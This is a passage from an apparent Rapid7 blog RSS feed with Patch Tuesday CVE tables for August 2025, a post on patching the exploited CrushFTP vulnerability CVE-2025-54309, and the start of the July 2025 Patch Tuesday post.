Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50160">CVE-2025-50160</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50162">CVE-2025-50162</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50164">CVE-2025-50164</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53720">CVE-2025-53720</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53132">CVE-2025-53132</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53724">CVE-2025-53724</a></td><td><p>Windows Push Notifications Apps Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53725">CVE-2025-53725</a></td><td><p>Windows Push Notifications Apps Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53726">CVE-2025-53726</a></td><td><p>Windows Push Notifications Apps Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50155">CVE-2025-50155</a></td><td><p>Windows Push Notifications Apps Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49761">CVE-2025-49761</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50173">CVE-2025-50173</a></td><td><p>Windows Installer Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53155">CVE-2025-53155</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53723">CVE-2025-53723</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53141">CVE-2025-53141</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53154">CVE-2025-53154</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53149">CVE-2025-53149</a></td><td><p>Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53152">CVE-2025-53152</a></td><td><p>Desktop Windows Manager Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50153">CVE-2025-50153</a></td><td><p>Desktop Windows Manager Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53722">CVE-2025-53722</a></td><td><p>Windows Remote Desktop Services Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50154">CVE-2025-50154</a></td><td><p>Microsoft Windows File Explorer Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50161">CVE-2025-50161</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50159">CVE-2025-50159</a></td><td><p>Remote Access Point-to-Point Protocol (PPP) EAP-TLS Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50158">CVE-2025-50158</a></td><td><p>Windows NTFS Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53140">CVE-2025-53140</a></td><td><p>Windows Kernel Transaction Manager Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50167">CVE-2025-50167</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49762">CVE-2025-49762</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53134">CVE-2025-53134</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53137">CVE-2025-53137</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53147">CVE-2025-53147</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53718">CVE-2025-53718</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53135">CVE-2025-53135</a></td><td><p>DirectX Graphics Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49743">CVE-2025-49743</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50166">CVE-2025-50166</a></td><td><p>Windows Distributed Transaction Coordinator (MSDTC) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50156">CVE-2025-50156</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53138">CVE-2025-53138</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53148">CVE-2025-53148</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53153">CVE-2025-53153</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53719">CVE-2025-53719</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50157">CVE-2025-50157</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53136">CVE-2025-53136</a></td><td><p>NT OS Kernel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><h3>ESU Windows Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53766">CVE-2025-53766</a></td><td><p>GDI+ Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr></tbody></table><h3>Microsoft Dynamics vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53728">CVE-2025-53728</a></td><td><p>Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49745">CVE-2025-49745</a></td><td><p>Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.4</p></td></tr></tbody></table><h3>Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49712">CVE-2025-49712</a></td><td><p>Microsoft SharePoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53733">CVE-2025-53733</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53784">CVE-2025-53784</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53731">CVE-2025-53731</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53740">CVE-2025-53740</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53738">CVE-2025-53738</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53761">CVE-2025-53761</a></td><td><p>Microsoft PowerPoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53730">CVE-2025-53730</a></td><td><p>Microsoft Office Visio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53734">CVE-2025-53734</a></td><td><p>Microsoft Office Visio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53732">CVE-2025-53732</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53741">CVE-2025-53741</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53759">CVE-2025-53759</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53735">CVE-2025-53735</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53737">CVE-2025-53737</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53739">CVE-2025-53739</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53760">CVE-2025-53760</a></td><td><p>Microsoft SharePoint Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53736">CVE-2025-53736</a></td><td><p>Microsoft Word Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr></tbody></table><h3>Open Source Software vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53788">CVE-2025-53788</a></td><td><p>Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr></tbody></table><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49758">CVE-2025-49758</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53727">CVE-2025-53727</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24999">CVE-2025-24999</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49759">CVE-2025-49759</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47954">CVE-2025-47954</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>Server Software vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53786">CVE-2025-53786</a></td><td><p>Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33051">CVE-2025-33051</a></td><td><p>Microsoft Exchange Server Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25005">CVE-2025-25005</a></td><td><p>Microsoft Exchange Server Tampering Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25006">CVE-2025-25006</a></td><td><p>Microsoft Exchange Server Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25007">CVE-2025-25007</a></td><td><p>Microsoft Exchange Server Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.3</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50165">CVE-2025-50165</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50171">CVE-2025-50171</a></td><td><p>Remote Desktop Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53131">CVE-2025-53131</a></td><td><p>Windows Media Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53789">CVE-2025-53789</a></td><td><p>Windows StateRepository API Server file Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53133">CVE-2025-53133</a></td><td><p>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53151">CVE-2025-53151</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50170">CVE-2025-50170</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50168">CVE-2025-50168</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50176">CVE-2025-50176</a></td><td><p>DirectX Graphics Kernel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50169">CVE-2025-50169</a></td><td><p>Windows SMB Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48807">CVE-2025-48807</a></td><td><p>Windows Hyper-V Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53779">CVE-2025-53779</a></td><td><p>Windows Kerberos Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>Yes</p></td><td><p>7.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53721">CVE-2025-53721</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53142">CVE-2025-53142</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49751">CVE-2025-49751</a></td><td><p>Windows Hyper-V Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53716">CVE-2025-53716</a></td><td><p>Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50172">CVE-2025-50172</a></td><td><p>DirectX Graphics Kernel Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53156">CVE-2025-53156</a></td><td><p>Windows Storage Port Driver Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53769">CVE-2025-53769</a></td><td><p>Windows Security App Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/patch-tuesday-august-2025</link>
      <guid isPermaLink="false">bltbfe1a8eb56fcd065</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 12 Aug 2025 21:44:54 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9952397815d84355/6849acff3860836b5c360685/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2025-54309: CrushFTP Zero-Day Exploited in the Wild]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>On Friday, July 18, 2025, managed file transfer vendor CrushFTP released information to a private mailing list on a </span><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025"><span style='font-size: undefined;'>new critical vulnerability</span></a><span style='font-size: undefined;'>, tracked as </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-54309"><span style='font-size: undefined;'>CVE-2025-54309</span></a><span style='font-size: undefined;'>, affecting versions below 10.8.5 and 11.3.4_23 across all platforms. According to the public-facing </span><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>, this vulnerability in the CrushFTP managed file transfer software web interface is being exploited in the wild. Based on the Indicators of Compromise provided in the advisory, a “last_logins” value set for the internal ‘default’ user account is indicative of exploitation.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>According to the </span><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>, CrushFTP versions </span><span style='font-size: undefined;'><strong>below 11.3.4_23 and 10.8.5 are vulnerable to CVE-2025-54309</strong></span><span style='font-size: undefined;'>. The latest available patched versions of CrushFTP, as of July 18, 2025, are:</span></p><p></p><ul><li style="direction: ltr;"><span style='font-size: undefined;'>CrushFTP 11.3.4_26</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>CrushFTP 10.8.5_12</span></li></ul><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The vendor advisory emphasizes the importance of updating to a fixed version of CrushFTP on an urgent basis. Rapid7 echoes this guidance and urges organizations to apply the vendor-supplied patch on an emergency basis, without waiting for a typical patch cycle to occur.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>While the vendor guidance, as of July 18, states “We don't believe people with a </span><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=DMZ"><span style='font-size: undefined;'>DMZ</span></a><span style='font-size: undefined;'> CrushFTP in front of their main are affected by this,” it’s unclear whether this is actually an effective barrier to exploitation. Out of an abundance of caution, Rapid7 advises against relying on a demilitarized zone (DMZ) as a mitigation strategy. The vendor </span><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025#section-CompromiseJuly2025-IfYouWereExploited"><span style='font-size: undefined;'>also notes</span></a><span style='font-size: undefined;'> that targeted installations should restore affected user account data from older backups.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><p style="direction: ltr;"><span style='font-size: undefined;'>An authenticated vulnerability check for InsightVM and Nexpose customers is in development and expected to be available in today’s (Friday, July 18) content release.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/crushftp-zero-day-exploited-in-the-wild</link>
      <guid isPermaLink="false">blt224e82934177b530</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Ryan Emmons]]></dc:creator>
      <pubDate>Fri, 18 Jul 2025 20:25:11 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt11e9686cec540b6e/6849381f7431da65da41b88f/post-hero-vulnerability.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - July 2025]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is addressing 137 vulnerabilities this </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Jul"><span style='font-size: undefined;'>July 2025 Patch Tuesday</span></a><span style='font-size: undefined;'>, which is above average. Microsoft is aware of public disclosure for just one of the vulnerabilities published today, and Microsoft isn’t aware of in-the-wild exploitation for any of today’s batch. This is the tenth consecutive month with no Patch Tuesday zero-day vulnerabilities evaluated as critical severity at time of publication. Today also sees the publication of 11 critical remote code execution (RCE) vulnerabilities. Three browser vulnerabilities have already been published separately this month, and are not included in the total.</span></p><h3><span style='font-size: undefined;'>SQL Server: zero-day info disclosure</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>It has been a quiet few months on the SQL Server front, but today Microsoft has published </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49719"><span style='font-size: undefined;'>CVE-2025-49719</span></a><span style='font-size: undefined;'>, a publicly disclosed information disclosure vulnerability, with all versions as far back as SQL Server 2016 receiving patches. Microsoft ranks this vulnerability as important, but not critical. Older versions of SQL Server with remaining Extended Security Update (ESU) program viability are not listed as receiving patches; instead, the advisory rather bluntly tells us that assets running SQL Server where the version number is not represented in the table on the advisory means that SQL Server version is no longer supported. ESU updates are released only for vulnerabilities which Microsoft deems to be critical severity, so ESU subscribers must now be hoping that today’s SQL Server zero-day vulnerability was first introduced in the SQL Server 2016 codebase.</span></p><p style="direction: ltr;"><span style='font-size: 